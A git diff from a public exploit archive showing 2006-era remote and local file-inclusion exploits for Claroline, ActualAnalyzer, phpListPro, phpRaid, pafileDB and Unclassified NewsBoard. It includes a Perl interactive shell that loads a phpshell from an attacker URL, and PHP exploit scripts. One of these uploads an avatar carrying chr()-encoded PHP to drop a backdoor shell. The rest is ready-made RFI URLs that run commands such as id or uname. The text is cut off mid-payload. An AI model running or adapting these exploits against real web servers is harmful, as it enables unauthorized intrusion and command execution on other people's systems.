-sub usage() {
- head();
- print " Usage: perl own.pl <host> <url-cmd> <var>\r\n\n";
- print " <host> - Full Path to Authentication Dir : http://host/claroline/auth/do \r\n";
- print " <url-cmd> - PhpShell : http://atacate/shell.gif \r\n";
- print " <var> - var name used in phpshell : cmd \r\n\r\n";
- exit();
- }
-
-# milw0rm.com [2006-05-08]
+#!/usr/bin/perl
+############
+# Claroline Open Source e-Learning 1.7.5 Remote File Include
+# Exploit & Advisorie: beford <xbefordx gmail com>
+#
+# uso:# perl own.pl <host> <cmd-shell-url> <cmd-var>
+# perl own.pl http://host.com/claroline/auth/ http://atacante/shell.gif cmd
+#
+# cmd shell example: <? system($cmd); ?>
+# cmd variable: cmd;
+#
+#############
+# Description
+#############
+# Vendor: http://www.claroline.net
+# The file claroline/auth/extauth/drivers/ldap.inc.php uses the variable
+# clarolineRepositorySys in a include() function without being declared.
+# There are other files vulnerable in the same folder, this exploit only
+# attacks ldap.inc.php
+#
+# There is other vulnerable file claroline/auth/extauth/casProcess.inc.php
+# it uses the claro_CasLibPath in a include function but this is not being
+# declared either, so pwnt, RFI. Vendor was contacted through email,
+# no response, so i just posted this here and on its forum.
+############
+# Vulnerable code (lda.inc.php)
+############
+# return require $clarolineRepositorySys.'/auth/extauth/extAuthProcess.inc.php';
+############
+# Vulnerable code (casProcess.inc.php)
+############
+#if ( ! isset($_SESSION['init_CasCheckinDone'] )
+# || $logout
+# || ( basename($_SERVER['SCRIPT_NAME']) == 'login.php' && isset($_REQUEST['authModeReq']) && $_REQUEST['authModeReq'] == 'CAS' )
+# || isset($_REQUEST['fromCasServer']) )
+#{
+# include_once $claro_CasLibPath;
+############
+use LWP::UserAgent;
+
+$Path = $ARGV[0];
+$Pathtocmd = $ARGV[1];
+$cmdv = $ARGV[2];
+if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }
+head();
+while() {
+ print "[shell] \$";
+ while(<STDIN>) {
+ $cmd=$_;
+ chomp($cmd);
+ if (!$cmd) {last;}
+ $xpl = LWP::UserAgent->new() or die;
+ $req = HTTP::Request->new(GET =>$Path.'extauth/drivers/ldap.inc.php?clarolineRepositorySys='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
+ $res = $xpl->request($req);
+ $return = $res->content;
+ $return =~ tr/[\n]/[ê]/;
+ if ($return =~/Error: HTTP request failed!/ ) {
+ print "\nInvalid path for phpshell\n";
+ exit;
+ } elsif ($return =~/^<br.\/>.<b>Fatal.error/) {
+ print "\nInvalid Command, error.\n\n";
+ }
+ if ($return =~ /(.*)/) {
+ $finreturn = $1;
+ $finreturn=~ tr/[ê]/[\n]/;
+ print "\r\n$finreturn\n\r";
+ last;
+ } else {
+ print "[shell] \$";
+ }
+ }
+} last;
+
+sub head() {
+ print "\n============================================================================\r\n";
+ print " Claroline Open Source e-Learning 1.7.5 Remote File Include\r\n";
+ print "============================================================================\r\n";
+ }
+
+sub usage() {
+ head();
+ print " Usage: perl own.pl <host> <url-cmd> <var>\r\n\n";
+ print " <host> - Full Path to Authentication Dir : http://host/claroline/auth/do \r\n";
+ print " <url-cmd> - PhpShell : http://atacate/shell.gif \r\n";
+ print " <var> - var name used in phpshell : cmd \r\n\r\n";
+ exit();
+ }
+
+# milw0rm.com [2006-05-08]
diff --git a/platforms/php/webapps/1767.txt b/platforms/php/webapps/1767.txt
index fffffeb71..0ff3313fa 100755
--- a/platforms/php/webapps/1767.txt
+++ b/platforms/php/webapps/1767.txt
@@ -1,19 +1,19 @@
-Title: ActualAnalyzer Server <=8.23 - Remote File Include Vulnerability
------------------------------------------------------------------
-Vendor: ActualScripts
-URL: http://actualscripts.com
------------------------------------------------------------------
-
-Credits:
-Discovered by: 'Aesthetico'
-http://www.majorsecurity.de
------------------------------------------------------------------
-Search for: "ActualScripts, Company. All rights reserved."
------------------------------------------------------------------
-
-Exploitation:
-
-/direct.php?rf=http://www.yourspace.com/yourscript.php?
-/direct.php?rf=http://www.yourspace.com/yourscript.txt?&ls%20-laF
-
-# milw0rm.com [2006-05-08]
+Title: ActualAnalyzer Server <=8.23 - Remote File Include Vulnerability
+-----------------------------------------------------------------
+Vendor: ActualScripts
+URL: http://actualscripts.com
+-----------------------------------------------------------------
+
+Credits:
+Discovered by: 'Aesthetico'
+http://www.majorsecurity.de
+-----------------------------------------------------------------
+Search for: "ActualScripts, Company. All rights reserved."
+-----------------------------------------------------------------
+
+Exploitation:
+
+/direct.php?rf=http://www.yourspace.com/yourscript.php?
+/direct.php?rf=http://www.yourspace.com/yourscript.txt?&ls%20-laF
+
+# milw0rm.com [2006-05-08]
diff --git a/platforms/php/webapps/1768.php b/platforms/php/webapps/1768.php
index 4a828a433..a1b371fa9 100755
--- a/platforms/php/webapps/1768.php
+++ b/platforms/php/webapps/1768.php
@@ -1,61 +1,61 @@ -<?php - -// No hard feelings ReZEN, I just post them when I get them. /str0ke - -/* -ActualAnalyzer Remote File Inclusion Exploit c0ded by ReZEN -Sh0uts: xorcrew.net, ajax, gml, #subterrain, D2K -url: http://www.xorcrew.net/ReZEN - -example: -turl: http://www.target.com/path to actualanalyzer/direct.php?rf= -hurl: http://www.pwn3d.com/evil.txt? - -*/ - -$cmd = $_POST["cmd"]; -$turl = $_POST["turl"]; -$hurl = $_POST["hurl"]; - -$form= "<form method=\"post\" action=\"".$PHP_SELF."\">" - ."turl:<br><input type=\"text\" name=\"turl\" size=\"90\" value=\"".$turl."\"><br>" - ."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\" value=\"".$hurl."\"><br>" - ."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" value=\"".$cmd."\"><br>" - ."<input type=\"submit\" value=\"Submit\" name=\"submit\">" - ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">"; - -if (!isset($_POST['submit'])) -{ - -echo $form; - -}else{ - -$file = fopen ("test.txt", "w+"); - -fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\"); -system(\"echo ++END++\"); ?>"); -fclose($file); - -$file = fopen ($turl.$hurl, "r"); -if (!$file) { - echo "<p>Unable to get output.\n"; - exit; -} - -echo $form; - -while (!feof ($file)) { - $line .= fgets ($file, 1024)."<br>"; - } -$tpos1 = strpos($line, "++BEGIN++"); -$tpos2 = strpos($line, "++END++"); -$tpos1 = $tpos1+strlen("++BEGIN++"); -$tpos2 = $tpos2-$tpos1; -$output = substr($line, $tpos1, $tpos2); -echo $output; - -} -?> - -# milw0rm.com [2006-05-08] +<?php + +// No hard feelings ReZEN, I just post them when I get them. /str0ke + +/* +ActualAnalyzer Remote File Inclusion Exploit c0ded by ReZEN +Sh0uts: xorcrew.net, ajax, gml, #subterrain, D2K +url: http://www.xorcrew.net/ReZEN + +example: +turl: http://www.target.com/path to actualanalyzer/direct.php?rf= +hurl: http://www.pwn3d.com/evil.txt? 
+ +*/ + +$cmd = $_POST["cmd"]; +$turl = $_POST["turl"]; +$hurl = $_POST["hurl"]; + +$form= "<form method=\"post\" action=\"".$PHP_SELF."\">" + ."turl:<br><input type=\"text\" name=\"turl\" size=\"90\" value=\"".$turl."\"><br>" + ."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\" value=\"".$hurl."\"><br>" + ."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" value=\"".$cmd."\"><br>" + ."<input type=\"submit\" value=\"Submit\" name=\"submit\">" + ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">"; + +if (!isset($_POST['submit'])) +{ + +echo $form; + +}else{ + +$file = fopen ("test.txt", "w+"); + +fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\"); +system(\"echo ++END++\"); ?>"); +fclose($file); + +$file = fopen ($turl.$hurl, "r"); +if (!$file) { + echo "<p>Unable to get output.\n"; + exit; +} + +echo $form; + +while (!feof ($file)) { + $line .= fgets ($file, 1024)."<br>"; + } +$tpos1 = strpos($line, "++BEGIN++"); +$tpos2 = strpos($line, "++END++"); +$tpos1 = $tpos1+strlen("++BEGIN++"); +$tpos2 = $tpos2-$tpos1; +$output = substr($line, $tpos1, $tpos2); +echo $output; + +} +?> + +# milw0rm.com [2006-05-08] diff --git a/platforms/php/webapps/1769.txt b/platforms/php/webapps/1769.txt index 45868111e..dd21c2eb8 100755 --- a/platforms/php/webapps/1769.txt +++ b/platforms/php/webapps/1769.txt 
@@ -1,21 +1,21 @@ -Title: phpListPro <= 2.01 - Remote File Include Vulnerability ------------------------------------------------------------------ -Vendor: SmartISoft -URL: http://smartisoft.com ------------------------------------------------------------------ - -Credits: -Discovered by: 'Aesthetico' -http://www.majorsecurity.de ------------------------------------------------------------------ -Search for: "PHPListPro ©2001-2006 SmartISoft" ------------------------------------------------------------------ - -Exploitation: - -/config.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF -/editsite.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF -/in.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF -/addsite.php?returnpath=http://mitglied.lycos.de/n0ssy/r57.txt?&cmd=ls - -# milw0rm.com [2006-05-08] +Title: phpListPro <= 2.01 - Remote File Include Vulnerability +----------------------------------------------------------------- +Vendor: SmartISoft +URL: http://smartisoft.com +----------------------------------------------------------------- + +Credits: +Discovered by: 'Aesthetico' +http://www.majorsecurity.de +----------------------------------------------------------------- +Search for: "PHPListPro ©2001-2006 SmartISoft" +----------------------------------------------------------------- + +Exploitation: + +/config.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF +/editsite.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF +/in.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF +/addsite.php?returnpath=http://mitglied.lycos.de/n0ssy/r57.txt?&cmd=ls + +# milw0rm.com [2006-05-08] diff --git a/platforms/php/webapps/1773.txt b/platforms/php/webapps/1773.txt index 367f0c932..48efb1c2b 100755 --- a/platforms/php/webapps/1773.txt +++ b/platforms/php/webapps/1773.txt 
@@ -1,56 +1,56 @@ -# Kurdish Security Advisory -# phpRaid Remote File Include [PHPBB/SMF] :} -# "Sosyalizim'de .srar insan olmakta .srard.r" Abdullah Ocalan -# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan@linuxmail.org - -# Script : phpRaid -# Script Website : http://www.spiffyjr.com/ -# Version : phpRaid v2.9.5 -" v3.0.b1 -" v3.0.b2 -" v3.0.b3 - -# Risk : High -# Class : Remote -# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards :D - -# w0rkz : "phpRaid" "inurl:"phpRaid" etc. :) - ---------------------------------------------------------------------- - -# cmd shell example: -# cmd shell variable: ($_GET[cmd]); - -Vulnerable code : At first for phpbb portal :) - -// define our auth type -define("AUTH","phpbb"); - -// database connection -global $user_group_table; -$user_group_table = $phpbb_prefix . "user_group"; - -// setup phpBB user integration -define('IN_PHPBB', true); - -// set this as the path to your phpBB installation -include($phpbb_root_path . 'extension.inc'); -include($phpbb_root_path . 'common.'.$phpEx); - ------------------------------------------------------------------ - -http://www.site.com/[phpraidpath]/auth/auth.php?phpbb_root_path=http://www.yourcode.com/x.txt?&cmd=id - -http://www.site.com/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=http://www.yourcode.com/x.txt?&cmd=uname -a - -# SMF # - -// includes -include($smf_root_path= . 
'SSI.php'); ------------------------------------------------------------------------ - -http://www.site.com/[phpraidpath]/auth/auth.php?smf_root_path=http://www.yourcode.com/x.txt?&cmd=id - -http://www.site.com/[phpraidpath]/auth/auth_SMF/smf_root_path=http://www.yourcode.com/x.txt?&cmd=uname -a - -# milw0rm.com [2006-05-09] +# Kurdish Security Advisory +# phpRaid Remote File Include [PHPBB/SMF] :} +# "Sosyalizim'de .srar insan olmakta .srard.r" Abdullah Ocalan +# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan@linuxmail.org + +# Script : phpRaid +# Script Website : http://www.spiffyjr.com/ +# Version : phpRaid v2.9.5 +" v3.0.b1 +" v3.0.b2 +" v3.0.b3 + +# Risk : High +# Class : Remote +# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards :D + +# w0rkz : "phpRaid" "inurl:"phpRaid" etc. :) + +--------------------------------------------------------------------- + +# cmd shell example: +# cmd shell variable: ($_GET[cmd]); + +Vulnerable code : At first for phpbb portal :) + +// define our auth type +define("AUTH","phpbb"); + +// database connection +global $user_group_table; +$user_group_table = $phpbb_prefix . "user_group"; + +// setup phpBB user integration +define('IN_PHPBB', true); + +// set this as the path to your phpBB installation +include($phpbb_root_path . 'extension.inc'); +include($phpbb_root_path . 'common.'.$phpEx); + +----------------------------------------------------------------- + +http://www.site.com/[phpraidpath]/auth/auth.php?phpbb_root_path=http://www.yourcode.com/x.txt?&cmd=id + +http://www.site.com/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=http://www.yourcode.com/x.txt?&cmd=uname -a + +# SMF # + +// includes +include($smf_root_path= . 
'SSI.php'); +----------------------------------------------------------------------- + +http://www.site.com/[phpraidpath]/auth/auth.php?smf_root_path=http://www.yourcode.com/x.txt?&cmd=id + +http://www.site.com/[phpraidpath]/auth/auth_SMF/smf_root_path=http://www.yourcode.com/x.txt?&cmd=uname -a + +# milw0rm.com [2006-05-09] diff --git a/platforms/php/webapps/1774.txt b/platforms/php/webapps/1774.txt index d3722a421..c6bafd211 100755 --- a/platforms/php/webapps/1774.txt +++ b/platforms/php/webapps/1774.txt @@ -1,22 +1,22 @@ -# PafileDB Remote File Inclusion[phpBB] -# -# Contact : irc.gigachat.net #ir4dex & darkfire@f4kelive.zzn.com -# Risk : High -# Class : Remote -# Script : pafileDB -# Version : not specified - ---------------------------------------------------------------------- - -Vulnerable code : - -$link_language = 'lang_english'; - include( $module_root_path . 'language/' . $link_language . '/lang_pafiledb.' . $phpEx ); ---------------------------------------------------------------------- - -http://www.site.com/[phpBBpath]/[pafiledbpath]/includes/pafiledb_constants.php?module_root_path=http://[attacker] - -by Darkfire and IR4DEX GROUP -Greetz: Smurf_RedHat :: V0lks - -# milw0rm.com [2006-05-09] +# PafileDB Remote File Inclusion[phpBB] +# +# Contact : irc.gigachat.net #ir4dex & darkfire@f4kelive.zzn.com +# Risk : High +# Class : Remote +# Script : pafileDB +# Version : not specified + +--------------------------------------------------------------------- + +Vulnerable code : + +$link_language = 'lang_english'; + include( $module_root_path . 'language/' . $link_language . '/lang_pafiledb.' . $phpEx ); +--------------------------------------------------------------------- + +http://www.site.com/[phpBBpath]/[pafiledbpath]/includes/pafiledb_constants.php?module_root_path=http://[attacker] + +by Darkfire and IR4DEX GROUP +Greetz: Smurf_RedHat :: V0lks + +# milw0rm.com [2006-05-09] 
diff --git a/platforms/php/webapps/1777.php b/platforms/php/webapps/1777.php index c24afe0cd..1651ae809 100755 --- a/platforms/php/webapps/1777.php +++ b/platforms/php/webapps/1777.php 
@@ -1,382 +1,382 @@ -#!/usr/bin/php -q -d short_open_tag=on -<? -echo "Unclassified NewsBoard <= 1.6.1 patch 1 ABBC[Config][smileset] arbitrary\r\n"; -echo "local inclusion\r\n"; -echo "by rgod rgod@autistici.org\r\n"; -echo "site: http://retrogod.altervista.org\r\n\r\n"; -echo "works with register_globals = On & magic_quotes_gpc = Off\r\n\r\n"; - -/* -1.5.3 patch level 4 and below, exploit is a bit different, ex: - -http://[target]/[path]/bb_lib/abbc.css.php?design_path=../../../../../../../../../etc/passwd%00 -*/ - -if ($argc<6) { -echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to UNB\r\n"; -echo "cmd: a shell command\r\n"; -echo "user/pass: you need a valid user account to upload files\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." localhost /unb/ your_username password cat ./../board.conf.php\r\n"; -echo "php ".$argv[0]." localhost /unb/ your_username password ls -la -p81\r\n"; -echo "php ".$argv[0]." localhost / your_username password ls -la -P1.1.1.1:80\r\n\r\n"; -die; -} - -/* software site: http://newsboard.unclassified.de/ - - description: "The Unclassified NewsBoard (short UNB) is an open-source, - PHP-based internet bulletin board system" - - vulnerable code in unb_lib/abbc.conf.php at lines 635-641: - - ... - // Smiley Definitions - if ($ABBC['Config']['smileset']) - { - $ABBC['Config']['smilepath'] = dirname(__FILE__) . '/designs/_smile/' . $ABBC['Config']['smileset'] . '/'; - $ABBC['Config']['smileurl'] = $UNB['LibraryURL'] . 'designs/_smile/' . $ABBC['Config']['smileset'] . '/'; - @include($ABBC['Config']['smilepath'] . 'config.php'); - } - ... - - $ABBC['Config']['smileset'] var is not initialized before to be used to include - files. You cannot have access to this code directly but in unb_lib/abbc.css.php - at line 16 we have: - - ... 
- require('abbc.conf.php'); - ... - - this script is not protected by the unb_lib folder .htaccess file: - - # Don't allow direct PHP requests in this directory - <Files *.inc.php> - Order allow,deny - Deny from all - </Files> - <Files *.lib.php> - Order allow,deny - Deny from all - </Files> - - so, if register_globals = On & magic_quotes_gpc = Off, you can include files - from local resources, poc: - - http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../../../../../../../../etc/passwd%00 - http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../upload/avatar_[user_id].jpeg%00&cmd=ls%20-la - http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../upload/photo_[user_id].jpeg%00&cmd=ls%20-la - - this script try to include an avatar or photo with malicious php code - inside, you need a valid account to upload files - - */ -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; - -} - -$host=$argv[1]; -$path=$argv[2]; -$username=$argv[3]; -$pass=$argv[4]; -$cmd="";$port=80;$proxy=""; -for ($i=5; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -echo "step 0 -> check if suntzu.php is already installed...\r\n"; -$packet ="GET ".$p."unb_lib/suntzu.php HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: cmd=".$cmd.";\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -if (strstr($html,"56789")) -{ - echo "Exploit succeeded..."; - $temp=explode("56789",$html); - die("\r\n".$temp[1]."\r\n"); -} - -echo "step 1 -> login...\r\n"; -$data ="LoginName=".urlencode(trim($username)); -$data.="&LoginPassword=".urlencode(trim($pass)); -$packet="POST ".$p."forum.php?req=setuser&module=main HTTP/1.0\r\n"; -$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -#debug -#echo quick_dump($packet); -sendpacketii($packet); -$temp=explode("Set-Cookie: ",$html); -$temp2=explode(' ',$temp[1]); -$cookie=$temp2[0]; -$temp2=explode(' ',$temp[2]); -$cookie.=" ".$temp2[0]; -echo 'Your 
cookie: '.$cookie."\r\n"; -$temp=explode("=",$cookie); -$temp2=explode("+",$temp[2]); -$id=$temp2[0]; -echo "User Id -> ".$id."\r\n"; - -echo "step 2 -> upload a malicious avatar with php code inside...\r\n"; -$shell= -chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x01).chr(0x07).chr(0x3c).chr(0x3f). -chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x24).chr(0x66).chr(0x70). -chr(0x3d).chr(0x66).chr(0x6f).chr(0x70).chr(0x65).chr(0x6e).chr(0x28).chr(0x22). -chr(0x73).chr(0x75).chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70). -chr(0x68).chr(0x70).chr(0x22).chr(0x2c).chr(0x22).chr(0x77).chr(0x22).chr(0x29). -chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x70).chr(0x75).chr(0x74).chr(0x73). -chr(0x28).chr(0x24).chr(0x66).chr(0x70).chr(0x2c).chr(0x22).chr(0x3c).chr(0x3f). -chr(0x70).chr(0x68).chr(0x70).chr(0x20).chr(0x65).chr(0x72).chr(0x72).chr(0x6f). -chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74). -chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x73). -chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).chr(0x5f). -chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).chr(0x30).chr(0x29). -chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).chr(0x65).chr(0x74). -chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).chr(0x71). -chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).chr(0x67).chr(0x70). -chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).chr(0x5c).chr(0x24). -chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b). -chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).chr(0x72). -chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65). -chr(0x73).chr(0x28).chr(0x5c).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f). -chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d). 
-chr(0x29).chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20). -chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x3b).chr(0x70).chr(0x61). -chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).chr(0x28).chr(0x5c). -chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45). -chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x65). -chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x35).chr(0x36).chr(0x37).chr(0x38). -chr(0x39).chr(0x3b).chr(0x3f).chr(0x3e).chr(0x22).chr(0x29).chr(0x3b).chr(0x0d). -chr(0x0a).chr(0x66).chr(0x63).chr(0x6c).chr(0x6f).chr(0x73).chr(0x65).chr(0x28). -chr(0x24).chr(0x66).chr(0x70).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x63). -chr(0x68).chr(0x6d).chr(0x6f).chr(0x64).chr(0x28).chr(0x22).chr(0x73).chr(0x75). -chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70). -chr(0x22).chr(0x2c).chr(0x37).chr(0x37).chr(0x37).chr(0x29).chr(0x3b).chr(0x0d). -chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a). -chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00). -chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00). -chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01). 
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff). -chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01). -chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03). -chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x08). -chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4). -chr(0x00).chr(0x15).chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x08).chr(0x09).chr(0xff).chr(0xc4).chr(0x00). -chr(0x14).chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03). -chr(0x01).chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f). 
